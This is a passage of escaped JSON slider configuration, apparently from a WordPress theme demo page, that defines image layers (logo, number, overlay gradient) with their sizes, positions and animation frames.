From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"32\":{\"text\":\"Image 7\",\"alias\":\"Pl01\",\"uid\":32,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/pl00-1.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"79px\",\"e\":true},\"n\":{\"v\":\"79px\"},\"t\":{\"v\":\"79px\"},\"m\":{\"v\":\"79px\"}},\"height\":{\"d\":{\"v\":\"79px\",\"e\":true},\"n\":{\"v\":\"79px\"},\"t\":{\"v\":\"79px\"},\"m\":{\"v\":\"79px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-226px\",\"e\":true},\"n\":{\"v\":\"-226px\"},\"t\":{\"v\":\"-226px\"},\"m\":{\"v\":\"-226px\"}},\"y\":{\"d\":{\"v\":\"256px\",\"e\":true},\"n\":{\"v\":\"256px\"},\"t\":{\"v\":\"256px\"},\"m\":{\"v\":\"256px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":21,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":21,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"33\":{\"text\":\"Image 7\",\"alias\":\"Logo\",\"uid\":33,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/logo-slider-landing.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"161px\",\"e\":true},\"n\":{\"v\":\"161px\"},\"t\":{\"v\":\"161px\"},\"m\":{\"v\":\"161px\"}},\"height\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"159px\"},\"t\":{\"v\":\"159px\"},\"m\":{\"v\":\"159px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-133px\",\"e\":true},\"n\":{\"v\":\"-133px\"},\"t\":{\"v\":\"-133px\"},\"m\":{\"v\":\"-133px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":22,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":22,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"34\":{\"text\":\"Image 7\",\"alias\":\"Number\",\"uid\":34,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2018\\/10\\/number.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"21px\",\"e\":true},\"n\":{\"v\":\"21px\"},\"t\":{\"v\":\"21px\"},\"m\":{\"v\":\"21px\"}},\"height\":{\"d\":{\"v\":\"31px\",\"e\":true},\"n\":{\"v\":\"31px\"},\"t\":{\"v\":\"31px\"},\"m\":{\"v\":\"31px\"}},\"originalWidth\":72,\"originalHeight\":72,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"-83px\",\"e\":true},\"n\":{\"v\":\"-83px\"},\"t\":{\"v\":\"-83px\"},\"m\":{\"v\":\"-83px\"}},\"y\":{\"d\":{\"v\":\"185px\",\"e\":true},\"n\":{\"v\":\"185px\"},\"t\":{\"v\":\"185px\"},\"m\":{\"v\":\"185px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\"}},\"zIndex\":23,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"puid\":11,\"groupOrder\":23,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":100},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":100},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8600,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.4.0\"},\"20\":{\"text\":\" \",\"alias\":\"Overlay-gradient\",\"uid\":20,\"size\":{\"width\":{\"d\":{\"v\":\"100%\"},\"n\":{\"v\":\"100%\"},\"t\":{\"v\":\"100%\"},\"m\":{\"v\":\"100%\"}},\"height\":{\"d\":{\"v\":\"1200px\",\"e\":true},\"n\":{\"v\":\"1200px\"},\"t\":{\"v\":\"1200px\",\"e\":true},\"m\":{\"v\":\"1300px\",\"e\":true}},\"covermode\":\"fullwidth\",\"originalWidth\":\"100%\",\"originalHeight\":\"1200px\"},\"position\":{\"x\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"-1100px\",\"e\":true},\"n\":{\"v\":\"-1100px\"},\"t\":{\"v\":\"-1200px\",\"e\":true},\"m\":{\"v\":\"-1300px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":24,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":24,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":10,\"startRelative\":10},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":8690,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"15\"},\"idle\":{\"color\":{\"d\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\